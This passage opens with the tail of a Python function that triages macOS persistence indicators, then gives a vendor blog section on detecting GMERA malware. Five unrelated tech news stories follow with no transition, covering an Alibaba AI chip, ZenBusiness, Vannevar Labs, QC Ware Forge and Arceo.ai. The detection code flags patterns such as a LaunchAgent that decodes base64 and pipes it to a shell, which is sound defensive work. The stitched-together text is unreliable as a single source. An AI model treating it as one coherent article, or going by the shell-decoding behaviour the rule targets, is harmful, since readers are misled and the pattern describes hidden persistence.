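            parent[pid] = ev["ppid"]
            bid = ev.get("bundle_id")
            if bid and bundle_id_spoofs_apple(bid):
                findings.append((pid, f"bundle identifier {bid!r} imitates com.apple"))
        elif ev["type"] == "file_write" and is_launch_agent_path(ev["path"]):
            findings.append((pid, "wrote a LaunchAgent (persistence)"))
            if is_hidden_path(ev["path"]):
                findings.append((pid, "LaunchAgent file name is dot-prefixed (hidden)"))
            args = plistlib.loads(ev["content"]).get("ProgramArguments", [])
            if decodes_and_executes(args):
                findings.append((pid, "LaunchAgent decodes base64 and pipes it to a shell"))

    def root_of(pid):                      # climb to the top of the process tree
        while parent.get(pid, 1) != 1:
            pid = parent[pid]
        return pid

    stories = {}
    for pid, text in findings:
        stories.setdefault(root_of(pid), []).append(text)
    # Illustrative policy: one indicator is worth a look, three or more in a
    # single lineage are treated as a block. A real engine weighs far more.
    return {root: {"findings": texts, "verdict": "block" if len(texts) >= 3 else "alert"}
            for root, texts in stories.items()}


if __name__ == "__main__":
    for label, events in (("sample", SAMPLE_EVENTS), ("legit", LEGIT_INSTALL_EVENTS)):
        print(label, triage(events))
```

Run as a script and the constructed GMERA-style chain resolves to one story rooted at the app process with four findings and a block verdict, while the legitimate installer produces a single “wrote a LaunchAgent” finding and an alert, matching the text’s point that a fresh LaunchAgent is worth a look but only the combination of hidden file, in-memory decoding and misleading identifier is damning. The confusable table is deliberately tiny; a production check would use a full homograph mapping.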

Detecting GMERA Malware Through Behavioral Inspection

So much for the theory, but does it work in practice? Despite the fact the GMERA malware application bundle itself will fail to run once the cert has been revoked (unless we were to remove the code signing or resign it with an ad hoc cert), it is still perfectly possible to execute the malicious run.sh script bundled in the application’s Resources folder without complaint from Apple’s built-in security tools. That means we can still test a significant part of the malware’s behaviour. And of course, it means an attacker could do this manually, and so could another malicious process that found the Stockfoli.app bundle lying around, perhaps in a subsequent infection incident.

Let’s see how the SentinelOne behavioral engine reacts to execution of the run.sh script. As soon as we execute the script, we get a detection on the Agent side.

image of agent detection

We can see more details on the Management console side:

image of management console

Note the MITRE ATT&CK TTPs:

Process dropped a hidden suspicious plist to achieve persistency {T1150}
Process wrote a hidden file to achieve persistency {T1158}
Process achieved persistency through launchd job {T1160}

As we have set the policy on our test machine to detect rather than block — so that we can inspect the malware’s behavior — SentinelOne lets the script continue its execution. The Attack Story Line shows the hierarchy of processes and the entire kill chain.

image of attack story line

Of course, in a live deployment you would set the policy to simply block this at the outset. For research purposes, however, the Detect Only policy is useful to examine the malware’s behavior and learn more about our adversaries’ TTPs.

Conclusion

The recently discovered GMERA malware doesn’t offer anything new in terms of attacker tools, tactics and procedures. It leverages a fairly well-worn, easily-constructed route to compromise and persistence: a fake app, a Launch Agent for persistence and a simple bash or zsh-based reverse shell to open the victim up to post-exploitation, data exfiltration and perhaps further infection. And yet, so many solutions – including Apple’s built-in offerings – fail to detect these kinds of threats pre-execution or on-execution, instead relying on discovery and software updates to belatedly offer protection to those that were lucky enough to avoid becoming victims in the first wave.

A solution that offers real defense-in-depth, with multiple static, behavioral and AI engines packaged in a single agent is the only way to stay ahead of attackers and protect your Mac users from whatever new threat comes next. Remember, malware authors can innovate to their hearts’ content, but insofar as they keep on acting suspiciously, we can keep on rooting them out. 


Alibaba unveils Hanguang 800, an AI inference chip it says significantly increases the speed of machine learning tasks

Alibaba Group introduced its first AI inference chip today, a neural processing unit called Hanguang 800 that it says makes performing machine learning tasks dramatically faster and more energy efficient. The chip, announced today during Alibaba Cloud’s annual Apsara Computing Conference in Hangzhou, is already being used to power features on Alibaba’s e-commerce sites, including product search and personalized recommendations. It will be made available to Alibaba Cloud customers later.

As an example of what the chip can do, Alibaba said it usually takes Taobao an hour to categorize the one billion product images that are uploaded to the e-commerce platform each day by merchants and prepare them for search and personalized recommendations. Using Hanguang 800, Taobao was able to complete the task in only five minutes.

Alibaba is already using Hanguang 800 in many of its business operations that need machine processing. In addition to product search and recommendations, this includes automatic translation on its e-commerce sites, advertising and intelligent customer services.

Though Alibaba hasn’t revealed when the chip will be available to its cloud customers, the chip may help Chinese companies reduce their dependence on U.S. technology as the trade war makes business partnerships between Chinese and American tech companies more difficult. It also can help Alibaba Cloud grow in markets outside of China. Within China, it is the market leader, but in the Asia-Pacific region, Alibaba Cloud still ranks behind Amazon, Microsoft and Google, according to the Synergy Research Group.

Hanguang 800 was created by T-Head, the unit that leads the development of chips for cloud and edge computing within Alibaba DAMO Academy, the global research and development initiative in which Alibaba is investing more than $15 billion. T-Head developed the chip’s hardware and algorithms designed for business apps, including Alibaba’s retail and logistics apps.

In a statement, Alibaba Group CTO and president of Alibaba Cloud Intelligence Jeff Zhang (pictured above) said, “The launch of Hanguang 800 is an important step in our pursuit of next-generation technologies, boosting computing capabilities that will drive both our current and emerging businesses while improving energy-efficiency.”

He added, “In the near future, we plan to empower our clients by providing access through our cloud business to the advanced computing that is made possible by the chip, anytime and anywhere.”

T-Head’s other launches included the XuanTie 910 earlier this year, an IoT processor based on RISC-V, the open-source hardware instruction set that began as a project at UC Berkeley. XuanTie 910 was created for heavy-duty IoT applications, including edge servers, networking, gateway and autonomous vehicles.

Alibaba DAMO Academy collaborates with universities around the world, including UC Berkeley and Tel Aviv University. Researchers in the program focus on machine learning, network security, visual computing and natural language processing, with the goal of serving two billion customers and creating 100 million jobs by 2035.

ZenBusiness raises $15M to help founders launch and grow ‘worry-free’

There are two sides to starting a new business. On one side, entrepreneurs need creativity, imagination — a dream, essentially — to find, build, and market a new product to users and consumers. But on the other side, they have to deal with the regulatory state and all the minutia that comes with running any business in the 21st century.

That includes such delightful topics as choosing a particular model for incorporation, ensuring that a business has the right licenses to operate, and tracking all the legal changes happening in 50 state legislatures every year. It can be inordinately complicated (and expensive!) to ensure that your business is ready and legal.

That’s where ZenBusiness comes in. The Austin-based startup wants to empower entrepreneurs to build businesses large and small by dramatically simplifying the processes required to launch a business and then grow it.

When I last chatted with the company 18 months ago, it had just raised a $4.5 million seed round and launched its platform. Today, it’s announcing that it has raised a new $15 million series A round led by return backer Greycroft, along with returning investors Lerer Hippeau and Revolution’s Rise of the Rest fund, alongside new investors Rosecliff Venture Partners, Interlock Partners and Recruit Strategic Partners.

The company launched with a product that was essentially an automated registered agent for new entrepreneurs. Under state incorporation laws, companies must designate a so-called “registered agent” to receive official notices from regulatory agencies, and so ZenBusiness chose this strategic point for entry into the market.

When I last chatted with CEO Ross Buhrdorf, he described rolling up this market as one of the key initial targets for the company:

ZenBusiness is the brainchild of Ross Buhrdorf, who joined vacation rental marketplace HomeAway five months after its inception as founding CTO, and stayed for a decade until its acquisition by Expedia in 2015 for $3.9 billion. Buhrdorf intended to take a year off, but “didn’t quite make it a year” he told me.

He explained to me that HomeAway in many ways followed a rollup playbook, “raising $400 million and acquired 26 companies.” Bringing that rollup lens while exploring new spaces, he ran into the corporate legal services market, which offers help to companies to keep them in compliance with the law. Buhrdorf liked what he saw. “It’s different in all 50 states, highly-regulated, which is great for technology, it is overpriced, and they underserve their customers.” He says the space is “completely ripe for disruption.”

Since that time, the company has expanded its product to help entrepreneurs get beyond merely incorporating to actually building out their business by recommending services like banking, lending, tax preparation, website building, and more. The hope is to provide a “worry-free” guarantee to entrepreneurs so that they can get those early critical logistics out of the way and back to actually operating and growing their business.

“Small businesses come through this funnel, they don’t necessarily know exactly what to do. So we curate that solution, and then we provide them with the basics for them to get up and running and to be successful,” Buhrdorf said.

He explained that the company has built out some tools itself such as a simple webpage creator, but in the long run, he hopes to partner with other providers who integrate into the ZenBusiness platform. For instance, ZenBusiness has partnered with Xero as the company’s main accounting provider, while also backstopping that offering with accountants working at ZenBusiness. The idea is that the automated tooling plus a little human touch can help most owners handle the day-to-day challenges of running a business.


The ZenBusiness team in 2018. Photo via ZenBusiness.

Buhrdorf is particularly focused on keeping the product very self-service and automated to allow it to focus on these smaller customers. “Many of the companies that you cover that are in the enterprise space, who provide solutions for medium-sized businesses, they have to charge, they have to have sales forces, it’s very competitive there,” Buhrdorf said. “What we’re after is the segment that’s underserved, it’s the long tail of the small business segment.”

ZenBusiness has expanded its services, and it is hoping to use the fresh infusion of capital to invest in building out community features that will allow small business owners to swap tips with each other and help one another grow their businesses (presumably with some guidance from ZenBusiness community managers and experts).

The company is now 40 employees predominantly in Austin with a small office in Peru. Since we last checked in, the company has transitioned to become a public benefit corporation, which Buhrdorf said was an attempt to better align the company’s charter with its mission orientation to help small business entrepreneurs.

Update: The funding total was changed from $10m to $15m. Sorry about that.

Vannevar Labs comes out of stealth to bring best-in-class AI tech to national security agencies

Few organizations have the complex data and analytics problems that challenge the defense and intelligence communities every single day. Whether it is managing petabytes of text, audio, or video data, finding extraordinarily small patterns in the noise, or processing multilingual analytics, the agencies at the heart of America’s national security system confront cutting-edge problems every day.

Despite the desire for better tools though, intelligence analysts are often stymied in procuring up-to-date software by the byzantine rules that drive Pentagon and intelligence procurement.

That’s why a former intelligence official and a former intelligence investor are looking to build a new platform that connects the best minds in artificial intelligence, machine learning, and natural language processing and bundles their work together into a service purchasable by these government agencies.

Through Palo Alto-based Vannevar, co-founders Brett Granberg and Nini Moorhead are hoping to launch their first product, which is focused on bringing NLP technologies like feature detection to international counterterrorism missions.


Co-founders Nini Moorhead and Brett Granberg of Vannevar Labs. Photo via Vannevar Labs.

The company is named for Vannevar Bush, who is often credited with inventing an early form of the computer, putting together the Manhattan Project which led to the atom bomb, and for writing a seminal essay that sort of predicted the internet decades before its inception.

The two chose this particular product as an entrée because of their past experiences. Before beginning Vannevar, Granberg spent two years at In-Q-Tel, the non-profit VC firm that works deeply with the intelligence community to supply agencies with the best in startup technology. He also was an advisor at Lilt, a real-time deep learning translation product that spun out of Chris Manning’s famed Stanford NLP research lab.

Meanwhile, Moorhead spent seven years working as a counterterrorism officer within the intelligence community, working to disrupt terrorist networks.

The two met while they overlapped at Stanford GSB and realized they had seen similar problems that they both wanted to solve. While in business school, “top of mind for me was some of the technological challenges that I encountered as an end user [and] analyst in the intelligence community,” Moorhead said. “We immediately connected and shared a lot of experiences in common in terms of seeing gaps between the really hard domain problems that I’d been working on in my career as an analyst and some of the technology that was available to me,” she said. The two actually met the first day of school.

Their approach is to take proven techniques and attempt to translate them into government use cases. “We’re not sort of inventing new math to solve these problems, we’re more taking cutting-edge approaches and just applying them to specific use cases,” Granberg said.

While the project is early, the team raised $4.5 million in seed venture capital funding from fellow GSB alum Katherine Boyle of General Catalyst and Costanoa Ventures. Boyle has made a big push into defense and highly-regulated industries as part of her investment practice, where she previously funded Anduril, the company started by Oculus founder Palmer Luckey that has attempted to apply ML technology to security issues such as battlefield awareness and border control (and gotten into some controversy along the way as well).

She is particularly excited about new ways for startups to secure government contracts at a speed faster than the sun burning out. Talking to me about the potential in this industry, she said:

We’ve been spending a lot of time with companies that are going after what’s known as Other Transaction Authorities, which are a new type of contracting vehicle that was developed in 2015 by former Secretary of Defense Ash Carter, to help tech companies work very quickly with the Department of Defense and with the intelligence community. So what historically might have taken 18 months to get a contract now takes 30 to 60 days for critical pieces of technology.

Boyle explained that Vannevar fits directly into her thesis for the future of government procurement. “Our view is that the companies that do best in the space are people who have worked in government or understand how to sell to governments,” she said. She noted that the company is very early, and her investment was primarily focused on the team.

I asked about recent controversies that have hit companies like Google, which saw a revolt by some employees over its involvement with a defense program called Project Maven, which attempted to use machine learning technology and apply that to the battlefield, so that, for instance, drones could increase their effectiveness during strikes.

Granberg said that “we think that the people that defend our country should have access to the best tools and technologies to do their job. We know these people, we used to work with them, and we want to help them.”

He understands the concerns of critics though, and says that Vannevar intends to work with the government to ensure ethics remains core to its product. “We believe it’s our responsibility to sort of shape that technology and help the government think about putting in place policies that … prevent the misuse from happening.”

Boyle agreed. “One of the things that we’ve noticed is that if you’re very transparent and upfront about the types of products you’re going to be building in the beginning, it’s not a recruitment problem, it’s not an ethics problem.” Unlike Google, which had a six-figure large workforce with many employees who don’t want to touch defense-related code, the hope for Granberg and Moorhead is that a company like Vannevar can build a coalition of the willing, as it were, and maybe solve some serious security problems as well.

QC Ware Forge will give developers access to quantum hardware and simulators across vendors

Quantum computing is almost ready for prime time, and, according to most experts, now is the time to start learning how to best develop for this new and less than intuitive technology. With multiple vendors like D-Wave, Google, IBM, Microsoft and Rigetti offering commercial and open-source hardware solutions, simulators and other tools, there’s already a lot of fragmentation in this business. QC Ware, which is launching its Forge cloud platform into beta today, wants to become the go-to middleman for accessing the quantum computing hardware and simulators of these vendors.

Forge, which like the rest of QC Ware’s efforts is aimed at enterprise users, will give developers the ability to run their algorithms on a variety of hardware platforms and simulators. The company argues that developers won’t need to have any previous expertise in quantum computing, though having a bit of background surely isn’t going to hurt. From Forge’s user interface, developers will be able to run algorithms for binary optimization, chemistry simulation and machine learning.


“Practical quantum advantage will occur. Most experts agree that it’s a matter of ‘when’ not ‘if.’ The way to pull that horizon closer is by having the user community fully engaged in quantum computing application discovery. The objective of Forge is to allow those users to access the full range of quantum computing resources through a single platform,” said Matt Johnson, CEO, QC Ware. “To assist our customers in that exploration, we are spending all of our cycles working on ways to squeeze as much power as possible out of near-term quantum computers, and to bake those methods into Forge.”

Currently, QC Ware Forge offers access to hardware from D-Wave, as well as open-source simulators running on Google’s and IBM’s clouds, with plans to support a wider variety of platforms in the near future.

Initially, QC Ware also told me that it offered direct access to IBM’s hardware, but that’s not yet the case. “We currently have the integration complete and actively utilized by QC Ware developers and quantum experts,” QC Ware’s head of business development Yianni Gamvros told me. “However, we are still working with IBM to put an agreement in place in order for our end-users to directly access IBM hardware. We expect that to be available in our next major release. For users, this makes it easier for them to deal with the churn. We expect different hardware vendors will lead at different times and that will keep changing every six months. And for our quantum computing hardware vendors, they have a channel partner they can sell through.”

Users who sign up for the beta will receive 30 days of access to the platform and one minute of actual Quantum Computing Time to evaluate the platform.

Arceo.ai raises $37 million to expand cyber insurance coverage and access

Critical cyber attacks on both businesses and individuals have been grabbing headlines at an alarming rate. Cybersecurity has moved from a background risk for enterprises to a critical day-to-day threat to business operations, forcing executive teams to pour time and hundreds of billions in capital into monitoring and prevention efforts.

Yet even as investment in security ticks up, the frequency and cost of cybercrime to businesses continues to rapidly accelerate, with the World Economic Forum estimating the economic loss due to cybercrime could reach $3 trillion by 2020.

More companies are now turning to cyber insurance as a means of mitigating financial exposure. However, for traditional insurers, cybersecurity remains a relatively nascent and unfamiliar issue, requiring risk-assessment data points and methodologies largely different from those seen in traditional insurance products. As a result, businesses often struggle to get the scale of cybersecurity coverage they require.

Arceo.ai is hoping to expand the size and scope of the cyber insurance market for both insurers and companies by providing insurers with the effective real-time data, analytics and context necessary to safely and efficiently underwrite cyber risk.

This morning, Arceo took a major step in achieving that goal, announcing the company has raised a $37 million round of funding led by Lightspeed Venture Partners and Founders Fund with participation from CRV and UL Ventures.

Using an expansive set of global sources across a customer’s digital footprint, Arceo.AI collects internal, external and macro cyber risk data which it uses to evaluate a company’s security and cyber risk management behavior. By automating the data collection process and connecting it with insurer underwriting processes, Arceo is able to keep its data and policy assessments up to date in real-time and enable faster, more efficient quotes.

A vital component of Arceo’s platform is its analytics offering. Using patented data science and cyber risk models, Arceo generates analytics-driven insights for insurance carriers, brokers and end-insured customers. For end-insured customers, Arceo helps companies understand whether they’re using the best mitigation strategies by providing policy recommendations and industry benchmarking to help contextualize day-to-day cyber behavior and hygiene. For underwriters, Arceo can provide specific insurance recommendations based on particular policy coverages.

Ultimately, Arceo looks to provide both insurers and the insured with actionable answers to key questions such as how one assesses cyber risk, how one determines what risks can be mitigated with technology alone, how one knows which systems are best and whether those systems are being used appropriately.


Arceo.ai Chairman Raj Shah. Image via Arceo.ai

In an interview with TechCrunch, Arceo Chairman Raj Shah explained that the company’s background expertise, proprietary data systems, and deep pedigree in both the security and insurance industries truly differentiate Arceo from competing solutions. For starters, both Shah and Arceo co-founder and CEO Vishaal Hariprasad have spent close to the entirety of their careers in national security and cybersecurity. Hariprasad started his career in the Air Force’s first cohort of cyber warfare officers, before teaming up with Shah to start Morta Security in 2012, a security startup the two sold to Palo Alto Networks in roughly two years.

After selling the company, Shah and Hariprasad remained in the security world before realizing that there was a natural intersection between security and insurance, and a real opportunity for risk transfer solutions.

“Having studied the market, we saw that people are spending more and more dollars on cybersecurity products… There are hundreds of thousands of new vendors every year… Spend is going up, but we don’t feel any safer!” Shah told TechCrunch.

“That’s when we said ‘Hey, we need to move beyond just thinking about technology points and products, and think about holistic cyber risk management.’ And this is where insurance has historically done a great job. Putting a price on behavior and making people think and letting them take risks… From life and death and health to buyers and property and casualty. And so cyber is that next class risk… So that’s really why we started the business. We wanted to provide a real way to manage the cyber stress that they’re facing and that will impact every single one of our digital lives.”

Since the company’s founding, Raj and Vishaal have been joined by a deep network of cyber and insurance experts. Today, Arceo also announced that Hemant Shah, founder and former CEO of catastrophe risk modeling company RMS, has joined Arceo’s Board of Directors. Additionally, earlier this month, the company announced that Mario Vitale, the former CEO of publicly traded insurance companies Willis Towers Watson and Zurich Insurance Group, would be joining the Arceo team as the company’s President.

The company noted that participation from high-profile industry vets like Hemant and Mario not only further advances Arceo’s competitive advantage but also acts as another major validation of the company’s future and work to date.

According to Arceo Chairman Raj Shah, after years of investing in R&D, the latest funds will be used towards expansion efforts and scaling Arceo to the broader ecosystem of insurance and brokers. Longer-term, the company hopes to offer the most complete combined cybersecurity and risk transfer solution to insurers and the insured, easing the stress around cyber threats for both enterprises and individuals and ultimately improving broader cyber resiliency.

If you’d like to hear more from Arceo’s Raj Shah, Raj will also be joining us this year on the Extra Crunch stage at TechCrunch Disrupt SF, where he’ll discuss how founders and companies should think about potential US government investment. Grab tickets here and we hope to see you there!